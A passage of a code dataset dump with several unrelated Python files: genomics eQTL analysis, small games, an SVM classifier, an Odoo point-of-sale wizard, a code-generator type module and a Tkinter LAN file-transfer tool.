here\n","sub_path":"buislope.py","file_name":"buislope.py","file_ext":"py","file_size_in_byte":6732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"112062555","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 20 02:15:22 2020\n\n@author: bingkun\n@project: hfb -- eqtl\n\n* process of eqtl tss/snp region after intersecting with interactions\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom scipy import stats\nimport seaborn as sns\nimport matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.rcParams['pdf.fonttype'] = 42\nmatplotlib.rcParams['ps.fonttype'] = 42\nmatplotlib.rcParams['figure.dpi']= 200\n\n\n# def post_intersect_eqtl(sig_tss, sig_snp, nonsig_tss, nonsig_snp, cellType):\ndate = \"0115\" \ncellType = \"RGC\"\n\nsig_tss = r'C:\\Users\\libin\\UCSF\\hfb\\eqtl\\20200115\\{}_sig_intersect_etql.tss'.format(cellType)\nsig_snp = r'C:\\Users\\libin\\UCSF\\hfb\\eqtl\\20200115\\{}_sig_intersect_etql.snp'.format(cellType)\nnonsig_tss = r'C:\\Users\\libin\\UCSF\\hfb\\eqtl\\20200115\\{}_nonsig_intersect_etql.tss'.format(cellType)\nnonsig_snp = r'C:\\Users\\libin\\UCSF\\hfb\\eqtl\\20200115\\{}_nonsig_intersect_etql.snp'.format(cellType)\n\nsig_tss_df = pd.read_csv(sig_tss, sep=\"\\t\", names=[\"chr\", \"start_tss\", \"end_tss\", \"pair_id\", \"gene_id\", \"npval\", \"dist\"])\nsig_snp_df = pd.read_csv(sig_snp, sep=\"\\t\", names=[\"chr\", \"start_snp\", \"end_snp\", \"pair_id\", \"gene_id\", \"npval\", \"dist\"])\nnonsig_tss_df = pd.read_csv(nonsig_tss, sep=\"\\t\", names=[\"chr\", \"start_tss\", \"end_tss\", \"pair_id\", \"gene_id\", \"npval\", \"dist\"])\nprint (\"nonsig tss duplicates: 
\", nonsig_tss_df[[\"pair_id\"]].shape[0] - nonsig_tss_df[[\"pair_id\"]].drop_duplicates().shape[0])\nnonsig_snp_df = pd.read_csv(nonsig_snp, sep=\"\\t\", names=[\"chr\", \"start_snp\", \"end_snp\", \"pair_id\", \"gene_id\", \"npval\", \"dist\"])\nprint (\"nonsig snp duplicates: \", nonsig_snp_df[[\"pair_id\"]].shape[0] - nonsig_snp_df[[\"pair_id\"]].drop_duplicates().shape[0])\n#nonsig_snp_df_dup_bool = nonsig_snp_df.duplicated(subset=['pair_id'], keep=False)\n#nonsig_snp_df_dup = nonsig_snp_df.loc[nonsig_snp_df_dup_bool == True]\n\nsig_merged = pd.merge(sig_tss_df, sig_snp_df, on = [\"chr\", \"pair_id\", \"gene_id\", \"npval\", \"dist\"])\n# check dups -- should be 0\nprint (\"sig duplicates: \", sig_merged[[\"pair_id\"]].shape[0] - sig_merged[[\"pair_id\"]].drop_duplicates().shape[0])\nnonsig_merged = pd.merge(nonsig_tss_df, nonsig_snp_df, on = [\"chr\", \"pair_id\", \"gene_id\", \"npval\", \"dist\"])\n#nonsig_merged_dup_bool = nonsig_merged.duplicated(subset=['pair_id'], keep=False)\n#nonsig_merged_dup = nonsig_merged.loc[nonsig_merged_dup_bool == True]\nprint (\"nonsig duplicates: \", nonsig_merged[[\"pair_id\"]].shape[0] - nonsig_merged[[\"pair_id\"]].drop_duplicates().shape[0])\nprint ('removing duplicates...')\nsig_merged = sig_merged.drop_duplicates(subset=['pair_id'])\nnonsig_merged = nonsig_merged.drop_duplicates(subset=['pair_id'])\n\nnpval_compair = pd.DataFrame()\nnpval_compair[\"{}_non_signif\".format(cellType)] = nonsig_merged[\"npval\"]\nnpval_compair[\"{}_signif\".format(cellType)] = sig_merged[\"npval\"]\nnpval_compair.to_csv(\"npval_compair_{}\".format(cellType), sep=\"\\t\", index=False, header=True)\nnpval_compair_melt = pd.melt(npval_compair, value_name=\"npval\", var_name=\"\")\n\nprint (\"sig pval: \", sig_merged[\"npval\"].describe())\nprint (\"nonsig pval: \", nonsig_merged[\"npval\"].describe())\nprint(stats.ks_2samp(sig_merged[\"npval\"], nonsig_merged[\"npval\"]))\n\nplt.figure(figsize=(10,7))\nsns.violinplot(x=\"\", y=\"npval\", data=npval_compair_melt, palette=\"Pastel1\", cut=0)\nplt.savefig(r'C:\\Users\\libin\\UCSF\\hfb\\eqtl\\20200115\\{}_{}_pval_compare.pdf'.format(cellType, date), transparent=True)\n\n# post_intersect_eqtl(sig_tss=sys.argv[1], sig_snp=sys.argv[2], nonsig_tss=sys.argv[3], nonsig_snp=sys.argv[4], cellType=sys.argv[5])","sub_path":"eQTL/post_intersection_eqtl.py","file_name":"post_intersection_eqtl.py","file_ext":"py","file_size_in_byte":3524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"642119853","text":"from random import randint\nrock = '''\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\n'''\n\npaper = '''\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\n'''\n\nscissors = '''\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\n'''\n\nmoves=[rock,paper,scissors]\ncomputer=moves[randint(0,2)]\nplayer=(int(input(\"Enter your move \\n1:Rock\\n2:paper\\n3:scissors \\n\")))-1\n3\nif(player not in range(0,3)):\n print(\"Sorry wrong move! 
You loose\")\nelse:\n print(f'YOUR MOVE {moves[player]}')\n print(f\"COMPUTER'S MOVE {computer}\")\n if(moves[player]==computer):\n print(\"It's a tie\")\n elif(computer==moves[0]):\n if(moves[player]==moves[1]):\n print(\"You won!!\")\n else:\n print(\"You loose\")\n elif(computer==moves[1]):\n if(moves[player]==moves[2]):\n print(\"You won!!\")\n else:\n print(\"You loose\")\n else:\n if(moves[player]==moves[0]):\n print(\"You won!!\")\n else:\n print(\"You loose\")\n \n \n","sub_path":"Random Codes/ASCII-ART-StonePaperScissors/stonepaperscissors.py","file_name":"stonepaperscissors.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"327570316","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n#########################################################\n# Author: Author \n#########################################################\n# File: listagem101.py\n# Description: Modelagem de uma televisão\n\nclass Televisao: \n\tdef __init__(self, min, max, canal):\n\t\tself.ligada = False \n\t\tself.canal = canal\n\t\tself.cmin = min \n\t\tself.cmax = max \n\n\tdef muda_canal_para_cima(self):\n\t\tif self.canal+1 <= self.cmax:\n\t\t\tself.canal += 1\n\n\tdef muda_canal_para_baixo(self):\n\t\tif self.canal-1 >= self.cmin:\n\t\t\tself.canal -= 1\n\ntv = Televisao(1,99,1)\n\nfor _ in range(0,120):\n\ttv.muda_canal_para_cima()\nprint(tv.canal)\n\nfor _ in range(0,120):\n\ttv.muda_canal_para_baixo()\n\nprint(tv.canal)\n","sub_path":"cap10/listagem101.py","file_name":"listagem101.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"175208983","text":"import numpy as np\nimport random\nimport math\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import minimize\nfrom sklearn.model_selection import KFold\n\n\ndef tune_slack(X, T, kernel=\"gaussian\", r=0.5, poly=2, sigma=2):\n c_array = np.power(2*np.ones(20), np.arange(-5, 15))\n errors = []\n\n for c in c_array:\n err = 0\n cv = KFold(n_splits=5)\n\n for train_index, test_index in cv.split(X):\n X_train, X_test, T_train, T_test = X[train_index], X[test_index], T[train_index], T[test_index]\n model = SVM(X_train, T_train, C=c, kernel_function=kernel, poly=poly, sigma=sigma, r=r)\n model.train()\n err += model.testing_error(X_test, T_test)\n errors.append(err)\n\n ind = np.argmin(errors)\n return c_array[ind]\n\n\nclass SVM():\n\n def __init__(self, X, T, kernel_function=\"gaussian\", poly=2, sigma=2,C=None, tol=1.0e-5, r= 0.5):\n\n self.kernel_function, self.poly, self.sigma = kernel_function, poly, sigma\n self.C, self.tol, self.b, self.r = C, tol, 0, r\n\n self.X = X\n self.T = T\n \n # Targets with value 0 result in b=0 ind=0, thus they get the value -1.\n for i in range(len(self.T)):\n if self.T[i] == 0:\n self.T[i] = -1\n \n self.N = self.X.shape[0]\n\n self.p_matrix = np.zeros((self.N, self.N))\n self.alpha_array = np.zeros(self.N)\n self.support_vectors = []\n\n def kernel(self, x, y):\n if self.kernel_function == \"linear\":\n return np.dot(x,y)+1\n elif self.kernel_function == \"polynomial\":\n return np.power(np.dot(x,y)+1, self.poly)\n elif self.kernel_function == \"radial\":\n return np.exp(-(np.linalg.norm(x-y))/(2*np.power(self.sigma,2)))\n elif self.kernel_function == \"gaussian\":\n return np.exp(-self.r**(-2)*np.linalg.norm(x-y)**2)\n\n def calculate_p(self):\n for i in range(self.N):\n for j in range(self.N):\n self.p_matrix[i][j] = 
self.T[i]*self.T[j]*self.kernel(self.X[i], self.X[j])\n\n def zerofun(self, alpha):\n return np.dot(alpha, self.T)\n\n def objective(self, alpha):\n res = 0\n for i in range(self.N):\n for j in range(self.N):\n res += 0.5 * alpha[i] * alpha[j] * self.p_matrix[i][j]\n \n return res-sum(alpha)\n\n def calculate_alpha(self):\n start = np.zeros(self.N)\n B = [(0, self.C) for b in range(self.N)]\n ret = minimize(self.objective, start, bounds=B, constraints={'type': 'eq', 'fun': self.zerofun})\n self.alpha_array= ret['x']\n\n # Extract non-zero alphas\n for i in range(self.N):\n if self.tol < self.alpha_array[i]:\n self.support_vectors.append([self.alpha_array[i], self.X[i], self.T[i]])\n \n def calculate_b(self):\n\n # Random SV (First one)\n support_target = self.support_vectors[0][2]\n support_vector = self.support_vectors[0][1]\n\n for i in range(self.N):\n if self.tol < self.alpha_array[i]:\n self.b += self.alpha_array[i]*self.T[i]*self.kernel(support_vector, self.X[i])\n self.b -= support_target\n\n def indicator(self, x):\n ind = 0\n for i in range(self.N):\n if self.tol < self.alpha_array[i]:\n ind += self.alpha_array[i]*self.T[i]*self.kernel(x,self.X[i])\n ind -= self.b\n return ind\n \n def train(self):\n self.calculate_p()\n self.calculate_alpha()\n self.calculate_b()\n\n # Not really Useful outside of 2D. \n\n def plot_2d_contour(self, xmin, xmax, ymin, ymax, N):\n xgrid = np.linspace(xmin, xmax, num=N)\n ygrid = np.linspace(ymin, ymax, num=N)\n\n grid = np.array([[self.indicator([x,y]) for x in xgrid] for y in ygrid])\n plt.contour(xgrid, ygrid, grid, (-1.0, 0.0, 1.0), colors = ('red', 'black', 'blue'), linewidths = (1, 3, 1))\n\n def plot_support_vectors(self):\n for i in range(len(self.support_vectors)):\n plt.scatter(self.support_vectors[i][1][0], self.support_vectors[i][1][1], color=\"orange\")\n \n def get_support_vectors(self):\n sv = []\n for i in range(len(self.support_vectors)):\n sv.append([self.support_vectors[i][1][0], self.support_vectors[i][1][1]])\n \n return np.array(sv)\n\n def error_rate(self, X, T):\n\n predictions = np.array([self.indicator(x) for x in X])\n predictions = np.where(predictions > 0.5, 1, -1)\n error_counts = np.count_nonzero(predictions - T)\n\n return error_counts/T.shape[0]\n\n def training_error(self):\n return self.error_rate(self.X, self.T)\n\n def testing_error(self, X, T):\n return self.error_rate(X, T)\n\n\n\n\n\n\n","sub_path":"SVM.py","file_name":"SVM.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"475314465","text":"import time\nimport os\nimport getch\nimport static_boards\nimport level_two\nimport display\nimport statystyki\nimport random\nimport create_character\nimport hall_of_fame\n\ndef score():\n \n name, start, end = main()\n a = str(end-start)\n hall_of_fame.write_to_file(name, a)\n hall_of_fame.read_score()\n\ndef main():\n name = create_character.create_character()\n \n static_boards.introduction_board()\n time.sleep(1)\n os.system(\"clear\")\n static_boards.autors_board()\n time.sleep(1)\n os.system(\"clear\")\n static_boards.wsad_board()\n time.sleep(1)\n os.system(\"clear\")\n\n player_x = 5 # pozycja wyjściowa gracza\n player_y = 2\n # statystyki\n level = 1\n hp,atack = create_character.chose_hero()\n hp, atack = statystyki.hero_statistics(hp, atack)\n live, atc = statystyki.enemy_statistic(3, random.randint(1, 3))\n score = 0\n level_one_board = level_two.draw_board()\n board = level_two.create_board(level_one_board)\n # 
Time start\n    start = time.time()\n    end = start\n    condition = True\n    while condition == True:\n        print(\"Player stats HP:\", hp, \"Attack:\", atack)\n        print(\"Monster live:\", live, \"Monster attack\", atc)\n        place_before = board[player_y][player_x]\n        board = level_two.insert_player(board, player_x, player_y)\n        level_two.print_board(board)\n\n        old_player_x = player_x\n        old_player_y = player_y\n        key = getch.getch()\n        os.system(\"clear\")\n\n        if key == 'w':\n            player_y -= 1\n            if board[player_y][player_x] == '#' or board[player_y][player_x] == '|' or board[player_y][player_x] == '~':\n                player_y += 1\n\n        elif key == 'a':\n            player_x -= 1\n            if board[player_y][player_x] == '#' or board[player_y][player_x] == '|' or board[player_y][player_x] == '~':\n                player_x += 1\n\n        elif key == 's':\n            player_y += 1\n            if board[player_y][player_x] == '#' or board[player_y][player_x] == '|' or board[player_y][player_x] == '~':\n                player_y -= 1\n\n        elif key == 'd':\n            player_x += 1\n            if board[player_y][player_x] == '#' or board[player_y][player_x] == '|' or board[player_y][player_x] == '~':\n                player_x -= 1\n\n        elif key == 'q':\n            break\n        if board[player_y][player_x] == 'T':\n            display.next_level()\n        if board[player_y][player_x] == 'p':\n            display.quest_1()\n        if place_before == \"!\":\n            print(\"Player {} attack monster {}\".format(hp, atack))\n            # hp, atack = hero_statistics(hp-atc, atack)\n            hp = hp - atc\n            print(\"Monster {} attack player {}\".format(live, atc))\n            # live, atc = enemy_statistic(live-atack, atc)\n            live = live - atack \n            if live <= 0:\n                board[old_player_y][old_player_x] = \"*\"\n                score += 1\n                live = 3\n            elif live > 0:\n                board[old_player_y][old_player_x] = place_before\n            if hp <= 0:\n                display.game_over()\n                end = time.time()\n                condition = False\n\n            if score == 5:\n                level_two_board = level_two.draw_board_2()\n                board = level_two.create_board_2(level_two_board)\n            if score == 9:\n                level_three_board = level_two.draw_board_3()\n                board = level_two.create_board_3(level_three_board)\n            if score == 11:\n                display.you_win()\n                end = time.time()\n                break\n        elif place_before != \"!\":\n            board[old_player_y][old_player_x] = place_before\n    return name, start, end\nscore()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
fields.float('Entrada de Caixa'),\n    }\n    _defaults = {\n        'state': 'init',\n        'added': lambda self,cr,uid,c: self._get_total_in_session(cr, uid, 'dotcom.pos.caixa.open', context=c),\n        'caixa_id': lambda self,cr,uid,c: self._get_session(cr, uid, 'dotcom.pos.caixa.open', context=c),\n    }\n    \n    def start(self, cr, uid, ids, context=None):\n        if context is None:\n            context = {}\n        self.write(cr, uid, ids, {'state': 'done'}, context=context)\n        return {\n            'name': _('Abrir Caixa'),\n            'view_type': 'form',\n            'view_mode': 'form',\n            'view_id': False,\n            'res_model': 'dotcom.pos.caixa.open',\n            'domain': [],\n            'context': dict(context, active_ids=ids),\n            'type': 'ir.actions.act_window',\n            'target': 'new',\n            'res_id': ids and ids[0] or False\n        }\n\n    def processar(self, cr, uid, ids, context=None):\n        if context is None:\n            context = {}\n        caixas = []\n        opened = []\n        created_pos = []\n        today = time.strftime('%Y-%m-%d')\n        pos_pool = self.pool.get('dotcom.pos.pos')\n        caixa_pool = self.pool.get('dotcom.pos.caixa.config')\n        history = self.pool.get('dotcom.pos.history')\n        \n        data = self.browse(cr,uid,ids)[-1]\n        \n        opened = pos_pool.search(cr, uid, [('state','=','open'),('user_id','=',uid)])\n        if opened:\n            raise osv.except_osv(_('Invalid action !'), _('O utilizador já possui uma caixa em aberto!'))\n        \n        last = history.search(cr, uid, [('user_id','=',uid)])\n        real_opening = 0\n        if last:\n            my_last = history.browse(cr, uid, last and last[0])\n            real_opening = my_last.next_day or 0\n        new_opening = real_opening\n        inject = False\n        if data.injection>0:\n            inject=True\n            new_opening = real_opening + data.injection\n        \n        caixas = caixa_pool.search(cr,uid,[('on','=',False),('estado','=',True),('user_id','=',uid)])\n        \n        if caixas:\n            for caixa in caixa_pool.browse(cr,uid,caixas):\n                \n                pos = {}\n                pos['caixa_id'] = caixa.id\n                pos['ref'] = 'POS/%s/%s' % (str(caixa.ref),str(time.strftime('%d.%m')))\n                user = caixa.user_id and caixa.user_id.name or ''\n                pos['name'] = 'POS/%s/%s' % (str(caixa.user_id.name),str(user))\n                pos['data'] = time.strftime('%Y-%m-%d')\n                pos['state'] = 'open'\n                sequencia = None\n                for sequence in caixa.sequence_ids:\n                    lower = time.strftime(str(sequence.fiscal_year_id.date_start))\n                    bigger = time.strftime(str(sequence.fiscal_year_id.date_stop))\n                    \n                    if lower<=today<=bigger:\n                        sequencia = sequence.id\n                        break\n                pos['sequence_id'] = sequencia\n                pos['opening'] = new_opening or 0\n                id_pos = self.pool.get('dotcom.pos.pos').create(cr,uid,pos)\n                created_pos.append(id_pos)\n                \n                balcao = {}\n                balcao['caixa_id'] = id_pos\n                balcao['config_caixa_id'] = caixa.id\n                \n                balcao_id = caixa and caixa.balcao_id and caixa.balcao_id.id\n                if balcao_id:\n                    self.pool.get('dotcom.balcao.vendas').write(cr, uid, balcao_id, balcao)\n                \n                self.pool.get('dotcom.pos.caixa.config').write(cr, uid, [caixa.id], {'on':True})\n        logger.info('Created POS with ID: %s' %created_pos)\n        \n        for pos in created_pos:\n            \n            pos_line = {}\n            pos_line['data'] = time.strftime('%Y-%m-%d %H:%M:%S')\n            pos_line['desc'] = _('Ultimo fecho')\n            pos_line['pos_id'] = pos\n            pos_line['valor'] = real_opening\n            pos_line['operacao'] = 'open'\n            self.pool.get('dotcom.pos.linha').create(cr, uid, pos_line)\n            \n            if inject:\n                other_line = {}\n                other_line['data'] = time.strftime('%Y-%m-%d %H:%M:%S')\n                other_line['desc'] = _('Ultimo Fecho')\n                other_line['pos_id'] = pos\n                other_line['valor'] = data.injection or 0\n                other_line['operacao'] = 'in'\n                self.pool.get('dotcom.pos.linha').create(cr, uid, other_line)\n        \n        self.pool.get('dotcom.pos.pos').change_filter(cr, uid, created_pos, context=context)\n        \n        
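# hand the freshly created POS records back to the client as an act_window\n        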
return {\n 'view_type': 'form',\n 'view_mode': 'tree,form',\n 'res_model': 'dotcom.pos.pos',\n 'res_id':created_pos,\n 'type': 'ir.actions.act_window',\n 'domain': \"[('state','in',['draft','open'])]\",\n 'context': context,\n }\n \ndotcom_pos_abrir_caixa()","sub_path":"dotcom_pos_new/wizard/abrir_caixa.py","file_name":"abrir_caixa.py","file_ext":"py","file_size_in_byte":6329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"216049695","text":"from abc import ABC, abstractmethod\nfrom enum import Enum, auto\nfrom itertools import chain\nfrom typing import (\n TYPE_CHECKING,\n Any,\n ClassVar,\n Dict,\n FrozenSet,\n Iterable,\n Iterator,\n List,\n Optional,\n Sequence,\n Set,\n Tuple,\n Type,\n TypeVar,\n Union,\n)\n\nfrom pydantic import create_model\n\nfrom datamodel_code_generator import Protocol, runtime_checkable\nfrom datamodel_code_generator.format import PythonVersion\nfrom datamodel_code_generator.imports import (\n IMPORT_ABC_MAPPING,\n IMPORT_ABC_SEQUENCE,\n IMPORT_DICT,\n IMPORT_LIST,\n IMPORT_LITERAL,\n IMPORT_LITERAL_BACKPORT,\n IMPORT_MAPPING,\n IMPORT_OPTIONAL,\n IMPORT_SEQUENCE,\n IMPORT_UNION,\n Import,\n)\nfrom datamodel_code_generator.reference import Reference, _BaseModel\n\nT = TypeVar('T')\n\n\nclass StrictTypes(Enum):\n str = 'str'\n bytes = 'bytes'\n int = 'int'\n float = 'float'\n bool = 'bool'\n\n\ndef chain_as_tuple(*iterables: Iterable[T]) -> Tuple[T, ...]:\n return tuple(chain(*iterables))\n\n\n@runtime_checkable\nclass Modular(Protocol):\n @property\n def module_name(self) -> str:\n raise NotImplementedError\n\n\nclass DataType(_BaseModel): # type: ignore\n type: Optional[str]\n reference: Optional[Reference]\n data_types: List['DataType'] = []\n is_func: bool = False\n kwargs: Optional[Dict[str, Any]]\n import_: Optional[Import] = None\n python_version: PythonVersion = PythonVersion.PY_37\n is_optional: bool = False\n is_dict: bool = False\n is_list: bool = False\n is_custom_type: bool = False\n literals: List[Union[int, str]] = []\n use_standard_collections: bool = False\n use_generic_container: bool = False\n alias: Optional[str] = None\n parent: Optional[Any] = None\n children: List[Any] = []\n strict: bool = False\n dict_key: Optional['DataType'] = None\n\n _exclude_fields: ClassVar[Set[str]] = {'parent', 'children'}\n _pass_fields: ClassVar[Set[str]] = {'parent', 'children', 'data_types', 'reference'}\n\n @classmethod\n def from_import(\n cls: Type['DataTypeT'],\n import_: Import,\n *,\n is_optional: bool = False,\n is_dict: bool = False,\n is_list: bool = False,\n is_custom_type: bool = False,\n strict: bool = False,\n kwargs: Optional[Dict[str, Any]] = None,\n ) -> 'DataTypeT':\n return cls(\n type=import_.import_,\n import_=import_,\n is_optional=is_optional,\n is_dict=is_dict,\n is_list=is_list,\n is_func=True if kwargs else False,\n is_custom_type=is_custom_type,\n strict=strict,\n kwargs=kwargs,\n )\n\n @property\n def unresolved_types(self) -> FrozenSet[str]:\n return frozenset(\n {\n t.reference.path\n for data_types in self.data_types\n for t in data_types.all_data_types\n if t.reference\n }\n | ({self.reference.path} if self.reference else set())\n )\n\n def replace_reference(self, reference: Reference) -> None:\n if not self.reference: # pragma: no cover\n raise Exception(\n f'`{self.__class__.__name__}.replace_reference()` can\\'t be called'\n f' when `reference` field is empty.'\n )\n\n self.reference.children.remove(self)\n self.reference = reference\n 
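# register this data type as a child of the replacement reference\n        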
reference.children.append(self)\n\n @property\n def module_name(self) -> Optional[str]:\n if self.reference and isinstance(self.reference.source, Modular):\n return self.reference.source.module_name\n return None # pragma: no cover\n\n @property\n def full_name(self) -> str:\n module_name = self.module_name\n if module_name:\n return f'{module_name}.{self.reference.short_name}' # type: ignore\n return self.reference.short_name # type: ignore\n\n @property\n def all_data_types(self) -> Iterator['DataType']:\n for data_type in self.data_types:\n yield from data_type.all_data_types\n yield self\n\n @property\n def all_imports(self) -> Iterator[Import]:\n for data_type in self.data_types:\n yield from data_type.all_imports\n yield from self.imports\n\n @property\n def imports(self) -> Iterator[Import]:\n if self.import_:\n yield self.import_\n imports: Tuple[Tuple[bool, Import], ...] = (\n (self.is_optional, IMPORT_OPTIONAL),\n (len(self.data_types) > 1, IMPORT_UNION),\n )\n if any(self.literals):\n import_literal = (\n IMPORT_LITERAL\n if self.python_version.has_literal_type\n else IMPORT_LITERAL_BACKPORT\n )\n imports = (\n *imports,\n (any(self.literals), import_literal),\n )\n\n if self.use_generic_container:\n if self.use_standard_collections:\n imports = (\n *imports,\n (self.is_list, IMPORT_ABC_SEQUENCE),\n (self.is_dict, IMPORT_ABC_MAPPING),\n )\n else:\n imports = (\n *imports,\n (self.is_list, IMPORT_SEQUENCE),\n (self.is_dict, IMPORT_MAPPING),\n )\n elif not self.use_standard_collections:\n imports = (\n *imports,\n (self.is_list, IMPORT_LIST),\n (self.is_dict, IMPORT_DICT),\n )\n for field, import_ in imports:\n if field and import_ != self.import_:\n yield import_\n\n if self.dict_key:\n yield from self.dict_key.imports\n\n def __init__(self, **values: Any) -> None:\n super().__init__(**values)\n\n for type_ in self.data_types:\n if type_.type == 'Any' and type_.is_optional:\n if any(\n t for t in self.data_types if t.type != 'Any'\n ): # pragma: no cover\n self.is_optional = True\n self.data_types = [\n t\n for t in self.data_types\n if not (t.type == 'Any' and t.is_optional)\n ]\n break\n\n for data_type in self.data_types:\n if data_type.reference or data_type.data_types:\n data_type.parent = self\n\n if self.reference:\n self.reference.children.append(self)\n\n @property\n def type_hint(self) -> str:\n type_: Optional[str] = self.alias or self.type\n if not type_:\n if len(self.data_types) > 1:\n type_ = f\"Union[{', '.join(data_type.type_hint for data_type in self.data_types)}]\"\n elif len(self.data_types) == 1:\n type_ = self.data_types[0].type_hint\n elif self.literals:\n type_ = (\n f\"Literal[{', '.join(repr(literal) for literal in self.literals)}]\"\n )\n else:\n if self.reference:\n type_ = self.reference.short_name\n else:\n # TODO support strict Any\n # type_ = 'Any'\n type_ = ''\n if self.reference and self.python_version == PythonVersion.PY_36:\n type_ = f\"'{type_}'\"\n if self.is_list:\n if self.use_generic_container:\n list_ = 'Sequence'\n elif self.use_standard_collections:\n list_ = 'list'\n else:\n list_ = 'List'\n type_ = f'{list_}[{type_}]' if type_ else list_\n elif self.is_dict:\n if self.use_generic_container:\n dict_ = 'Mapping'\n elif self.use_standard_collections:\n dict_ = 'dict'\n else:\n dict_ = 'Dict'\n if self.dict_key or type_:\n key = self.dict_key.type_hint if self.dict_key else 'str'\n type_ = f'{dict_}[{key}, {type_ or \"Any\"}]'\n else: # pragma: no cover\n type_ = dict_\n if self.is_optional and type_ != 'Any':\n type_ = 
f'Optional[{type_}]'\n elif self.is_func:\n if self.kwargs:\n kwargs: str = ', '.join(f'{k}={v}' for k, v in self.kwargs.items())\n return f'{type_}({kwargs})'\n return f'{type_}()'\n return type_\n\n\nDataType.update_forward_refs()\n\nDataTypeT = TypeVar('DataTypeT', bound=DataType)\n\n\nclass Types(Enum):\n integer = auto()\n int32 = auto()\n int64 = auto()\n number = auto()\n float = auto()\n double = auto()\n decimal = auto()\n time = auto()\n string = auto()\n byte = auto()\n binary = auto()\n date = auto()\n date_time = auto()\n password = auto()\n email = auto()\n uuid = auto()\n uuid1 = auto()\n uuid2 = auto()\n uuid3 = auto()\n uuid4 = auto()\n uuid5 = auto()\n uri = auto()\n hostname = auto()\n ipv4 = auto()\n ipv6 = auto()\n boolean = auto()\n object = auto()\n null = auto()\n array = auto()\n any = auto()\n\n\nclass DataTypeManager(ABC):\n def __init__(\n self,\n python_version: PythonVersion = PythonVersion.PY_37,\n use_standard_collections: bool = False,\n use_generic_container_types: bool = False,\n strict_types: Optional[Sequence[StrictTypes]] = None,\n ) -> None:\n self.python_version = python_version\n self.use_standard_collections: bool = use_standard_collections\n self.use_generic_container_types: bool = use_generic_container_types\n self.strict_types: Sequence[StrictTypes] = strict_types or ()\n\n if (\n use_generic_container_types and python_version == PythonVersion.PY_36\n ): # pragma: no cover\n raise Exception(\n \"use_generic_container_types can not be used with target_python_version 3.6.\\n\"\n \" The version will be not supported in a future version\"\n )\n\n if TYPE_CHECKING:\n self.data_type: Type[DataType]\n else:\n self.data_type: Type[DataType] = create_model(\n 'ContextDataType',\n python_version=python_version,\n use_standard_collections=use_standard_collections,\n use_generic_container=use_generic_container_types,\n __base__=DataType,\n )\n\n @abstractmethod\n def get_data_type(self, types: Types, **kwargs: Any) -> DataType:\n raise NotImplementedError\n\n def get_data_type_from_full_path(\n self, full_path: str, is_custom_type: bool\n ) -> DataType:\n return self.data_type.from_import(\n Import.from_full_path(full_path), is_custom_type=is_custom_type\n )\n","sub_path":"datamodel_code_generator/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":10896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"625562181","text":"from threading import Thread\nimport tkinter\nfrom tkinter import filedialog\nfrom tkinter import *\nfrom tkinter import messagebox\nimport os\nimport socket\n\n\ndef search_for_file_path():\n global tempdir\n currdir = os.getcwd()\n tempdir = filedialog.askopenfilename(filetypes=((\"All files\", \"*\"), (\"Template files\", \"*.type\")))\n if len(tempdir) > 0:\n print(\"You chose: %s\" % tempdir)\n confirm()\n\n\ndef hostip():\n global conn\n global s\n global host\n global port\n global addr\n global hostt\n s = socket.socket()\n host = socket.gethostname()\n hostt = socket.gethostbyname(host)\n port = 5000\n\n\ndef send():\n flag = \"1\"\n conn.send(flag.encode())\n filename = tempdir\n ff = tempdir.split(\"/\")\n conn.send(str(ff[-1]).encode())\n file = open(filename, 'rb')\n file_data = file.read(40960000)\n conn.send(file_data)\n print(\"Data has been transmitted successfully\")\n\n\ndef confirm():\n def conf1():\n MsgBox = messagebox.askquestion('Confirm', 'Do you want to start the server and send %s ?' 
% (str(tempdir)),\n                                        icon='warning')\n        if MsgBox == 'yes':\n            send()\n        else:\n            messagebox.showinfo('Return', 'You will now return to the application screen')\n\n    cof = Button(root, text=\"Send\", height=1, width=8, fg=\"white\", font=(\"Arial\", 10), bg=\"black\", command=conf1)\n    cof.place(x=130, y=220)\n\n\ndef wait_for_connection():\n    global conn, addr\n    try:\n        s.bind((hostt, port))\n        s.listen(10)\n        conn, addr = s.accept()\n        print(addr, \"Has connected to the server\")\n        root.after(1, ww.destroy)\n        conn_label = Label(root, text=\"%s has connected.\" % (str(addr[0])), font=(\"Arial\", 13))\n        conn_label.place(x=40, y=140)\n        select_file = Label(root, text=\"Select File: \", font=(\"Arial Bold\", 12))\n        select_file.place(x=40, y=180)\n        file_name = StringVar()\n        sel_but = Button(root, text=\"Browse\", height=1, width=8, fg=\"white\", font=(\"Arial\", 10), bg=\"black\",\n                         command=search_for_file_path)\n        sel_but.place(x=130, y=180)\n\n    except Exception as e:\n        print(e)\n\n\ndef startserver():\n    root.after(1, start_button.destroy)\n    global ww\n    ww = Label(root, text=\"Waiting for Incoming Connections\", font=(\"Arial\", 13))\n    ww.place(x=40, y=140)\n    global t\n    t = Thread(target=wait_for_connection)\n    try:\n        t.start()\n    except Exception as e:\n        print(e)\n\n\n# ch = input(\"Press Enter to select file.\")\nhostip()\nglobal root\nglobal start_button\nroot = tkinter.Tk()\nroot.title(\"File transfer\")\nroot.geometry(\"330x300\")\nLabel(text=\"LAN File Transfer\", 